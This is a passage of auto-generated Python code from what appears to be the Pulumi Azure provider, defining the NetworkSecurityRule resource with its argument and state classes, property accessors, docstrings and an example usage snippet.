if source_port_range is not None: pulumi.set(__self__, "source_port_range", source_port_range) if source_port_ranges is not None: pulumi.set(__self__, "source_port_ranges", source_port_ranges) @property @pulumi.getter def access(self) -> pulumi.Input[str]: """ Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. """ return pulumi.get(self, "access") @access.setter def access(self, value: pulumi.Input[str]): pulumi.set(self, "access", value) @property @pulumi.getter def direction(self) -> pulumi.Input[str]: """ The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. """ return pulumi.get(self, "direction") @direction.setter def direction(self, value: pulumi.Input[str]): pulumi.set(self, "direction", value) @property @pulumi.getter(name="networkSecurityGroupName") def network_security_group_name(self) -> pulumi.Input[str]: """ The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. """ return pulumi.get(self, "network_security_group_name") @network_security_group_name.setter def network_security_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "network_security_group_name", value) @property @pulumi.getter def priority(self) -> pulumi.Input[int]: """ Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. """ return pulumi.get(self, "priority") @priority.setter def priority(self, value: pulumi.Input[int]): pulumi.set(self, "priority", value) @property @pulumi.getter def protocol(self) -> pulumi.Input[str]: """ Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). """ return pulumi.get(self, "protocol") @protocol.setter def protocol(self, value: pulumi.Input[str]): pulumi.set(self, "protocol", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ A description for this rule. Restricted to 140 characters. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="destinationAddressPrefix") def destination_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. """ return pulumi.get(self, "destination_address_prefix") @destination_address_prefix.setter def destination_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_address_prefix", value) @property @pulumi.getter(name="destinationAddressPrefixes") def destination_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. """ return pulumi.get(self, "destination_address_prefixes") @destination_address_prefixes.setter def destination_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_address_prefixes", value) @property @pulumi.getter(name="destinationApplicationSecurityGroupIds") def destination_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of destination Application Security Group ID's """ return pulumi.get(self, "destination_application_security_group_ids") @destination_application_security_group_ids.setter def destination_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_application_security_group_ids", value) @property @pulumi.getter(name="destinationPortRange") def destination_port_range(self) -> Optional[pulumi.Input[str]]: """ Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. """ return pulumi.get(self, "destination_port_range") @destination_port_range.setter def destination_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_port_range", value) @property @pulumi.getter(name="destinationPortRanges") def destination_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination ports or port ranges. This is required if `destination_port_range` is not specified. """ return pulumi.get(self, "destination_port_ranges") @destination_port_ranges.setter def destination_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_port_ranges", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="sourceAddressPrefix") def source_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. """ return pulumi.get(self, "source_address_prefix") @source_address_prefix.setter def source_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_address_prefix", value) @property @pulumi.getter(name="sourceAddressPrefixes") def source_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. """ return pulumi.get(self, "source_address_prefixes") @source_address_prefixes.setter def source_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_address_prefixes", value) @property @pulumi.getter(name="sourceApplicationSecurityGroupIds") def source_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of source Application Security Group ID's """ return pulumi.get(self, "source_application_security_group_ids") @source_application_security_group_ids.setter def source_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_application_security_group_ids", value) @property @pulumi.getter(name="sourcePortRange") def source_port_range(self) -> Optional[pulumi.Input[str]]: """ Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. """ return pulumi.get(self, "source_port_range") @source_port_range.setter def source_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_port_range", value) @property @pulumi.getter(name="sourcePortRanges") def source_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source ports or port ranges. This is required if `source_port_range` is not specified. """ return pulumi.get(self, "source_port_ranges") @source_port_ranges.setter def source_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_port_ranges", value) @pulumi.input_type class _NetworkSecurityRuleState: def __init__(__self__, *, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ Input properties used for looking up and filtering NetworkSecurityRule resources. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. :param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. """ if access is not None: pulumi.set(__self__, "access", access) if description is not None: pulumi.set(__self__, "description", description) if destination_address_prefix is not None: pulumi.set(__self__, "destination_address_prefix", destination_address_prefix) if destination_address_prefixes is not None: pulumi.set(__self__, "destination_address_prefixes", destination_address_prefixes) if destination_application_security_group_ids is not None: pulumi.set(__self__, "destination_application_security_group_ids", destination_application_security_group_ids) if destination_port_range is not None: pulumi.set(__self__, "destination_port_range", destination_port_range) if destination_port_ranges is not None: pulumi.set(__self__, "destination_port_ranges", destination_port_ranges) if direction is not None: pulumi.set(__self__, "direction", direction) if name is not None: pulumi.set(__self__, "name", name) if network_security_group_name is not None: pulumi.set(__self__, "network_security_group_name", network_security_group_name) if priority is not None: pulumi.set(__self__, "priority", priority) if protocol is not None: pulumi.set(__self__, "protocol", protocol) if resource_group_name is not None: pulumi.set(__self__, "resource_group_name", resource_group_name) if source_address_prefix is not None: pulumi.set(__self__, "source_address_prefix", source_address_prefix) if source_address_prefixes is not None: pulumi.set(__self__, "source_address_prefixes", source_address_prefixes) if source_application_security_group_ids is not None: pulumi.set(__self__, "source_application_security_group_ids", source_application_security_group_ids) if source_port_range is not None: pulumi.set(__self__, "source_port_range", source_port_range) if source_port_ranges is not None: pulumi.set(__self__, "source_port_ranges", source_port_ranges) @property @pulumi.getter def access(self) -> Optional[pulumi.Input[str]]: """ Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. """ return pulumi.get(self, "access") @access.setter def access(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "access", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ A description for this rule. Restricted to 140 characters. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="destinationAddressPrefix") def destination_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. """ return pulumi.get(self, "destination_address_prefix") @destination_address_prefix.setter def destination_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_address_prefix", value) @property @pulumi.getter(name="destinationAddressPrefixes") def destination_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. """ return pulumi.get(self, "destination_address_prefixes") @destination_address_prefixes.setter def destination_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_address_prefixes", value) @property @pulumi.getter(name="destinationApplicationSecurityGroupIds") def destination_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of destination Application Security Group ID's """ return pulumi.get(self, "destination_application_security_group_ids") @destination_application_security_group_ids.setter def destination_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_application_security_group_ids", value) @property @pulumi.getter(name="destinationPortRange") def destination_port_range(self) -> Optional[pulumi.Input[str]]: """ Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. """ return pulumi.get(self, "destination_port_range") @destination_port_range.setter def destination_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_port_range", value) @property @pulumi.getter(name="destinationPortRanges") def destination_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination ports or port ranges. This is required if `destination_port_range` is not specified. """ return pulumi.get(self, "destination_port_ranges") @destination_port_ranges.setter def destination_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_port_ranges", value) @property @pulumi.getter def direction(self) -> Optional[pulumi.Input[str]]: """ The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. """ return pulumi.get(self, "direction") @direction.setter def direction(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "direction", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="networkSecurityGroupName") def network_security_group_name(self) -> Optional[pulumi.Input[str]]: """ The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. """ return pulumi.get(self, "network_security_group_name") @network_security_group_name.setter def network_security_group_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "network_security_group_name", value) @property @pulumi.getter def priority(self) -> Optional[pulumi.Input[int]]: """ Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. """ return pulumi.get(self, "priority") @priority.setter def priority(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "priority", value) @property @pulumi.getter def protocol(self) -> Optional[pulumi.Input[str]]: """ Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). """ return pulumi.get(self, "protocol") @protocol.setter def protocol(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "protocol", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> Optional[pulumi.Input[str]]: """ The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter(name="sourceAddressPrefix") def source_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. """ return pulumi.get(self, "source_address_prefix") @source_address_prefix.setter def source_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_address_prefix", value) @property @pulumi.getter(name="sourceAddressPrefixes") def source_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. """ return pulumi.get(self, "source_address_prefixes") @source_address_prefixes.setter def source_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_address_prefixes", value) @property @pulumi.getter(name="sourceApplicationSecurityGroupIds") def source_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of source Application Security Group ID's """ return pulumi.get(self, "source_application_security_group_ids") @source_application_security_group_ids.setter def source_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_application_security_group_ids", value) @property @pulumi.getter(name="sourcePortRange") def source_port_range(self) -> Optional[pulumi.Input[str]]: """ Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. """ return pulumi.get(self, "source_port_range") @source_port_range.setter def source_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_port_range", value) @property @pulumi.getter(name="sourcePortRanges") def source_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source ports or port ranges. This is required if `source_port_range` is not specified. """ return pulumi.get(self, "source_port_ranges") @source_port_ranges.setter def source_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_port_ranges", value) class NetworkSecurityRule(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, __props__=None): """ Manages a Network Security Rule. > **NOTE on Network Security Groups and Network Security Rules:** This provider currently provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource. At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup", location=example_resource_group.location, resource_group_name=example_resource_group.name) example_network_security_rule = azure.network.NetworkSecurityRule("exampleNetworkSecurityRule", priority=100, direction="Outbound", access="Allow", protocol="Tcp", source_port_range="*", destination_port_range="*", source_address_prefix="*", destination_address_prefix="*", resource_group_name=example_resource_group.name, network_security_group_name=example_network_security_group.name) ``` ## Import Network Security Rules can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:network/networkSecurityRule:NetworkSecurityRule rule1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup/securityRules/rule1 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. :param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. """ ... @overload def __init__(__self__, resource_name: str, args: NetworkSecurityRuleArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Manages a Network Security Rule. > **NOTE on Network Security Groups and Network Security Rules:** This provider currently provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource. At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup", location=example_resource_group.location, resource_group_name=example_resource_group.name) example_network_security_rule = azure.network.NetworkSecurityRule("exampleNetworkSecurityRule", priority=100, direction="Outbound", access="Allow", protocol="Tcp", source_port_range="*", destination_port_range="*", source_address_prefix="*", destination_address_prefix="*", resource_group_name=example_resource_group.name, network_security_group_name=example_network_security_group.name) ``` ## Import Network Security Rules can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:network/networkSecurityRule:NetworkSecurityRule rule1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup/securityRules/rule1 ``` :param str resource_name: The name of the resource. :param NetworkSecurityRuleArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(NetworkSecurityRuleArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = NetworkSecurityRuleArgs.__new__(NetworkSecurityRuleArgs) if access is None and not opts.urn: raise TypeError("Missing required property 'access'") __props__.__dict__["access"] = access __props__.__dict__["description"] = description __props__.__dict__["destination_address_prefix"] = destination_address_prefix __props__.__dict__["destination_address_prefixes"] = destination_address_prefixes __props__.__dict__["destination_application_security_group_ids"] = destination_application_security_group_ids __props__.__dict__["destination_port_range"] = destination_port_range __props__.__dict__["destination_port_ranges"] = destination_port_ranges if direction is None and not opts.urn: raise TypeError("Missing required property 'direction'") __props__.__dict__["direction"] = direction __props__.__dict__["name"] = name if network_security_group_name is None and not opts.urn: raise TypeError("Missing required property 'network_security_group_name'") __props__.__dict__["network_security_group_name"] = network_security_group_name if priority is None and not opts.urn: raise TypeError("Missing required property 'priority'") __props__.__dict__["priority"] = priority if protocol is None and not opts.urn: raise TypeError("Missing required property 'protocol'") __props__.__dict__["protocol"] = protocol if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__.__dict__["resource_group_name"] = resource_group_name __props__.__dict__["source_address_prefix"] = source_address_prefix __props__.__dict__["source_address_prefixes"] = source_address_prefixes __props__.__dict__["source_application_security_group_ids"] = source_application_security_group_ids __props__.__dict__["source_port_range"] = source_port_range __props__.__dict__["source_port_ranges"] = source_port_ranges super(NetworkSecurityRule, __self__).__init__( 'azure:network/networkSecurityRule:NetworkSecurityRule', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'NetworkSecurityRule': """ Get an existing NetworkSecurityRule resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or 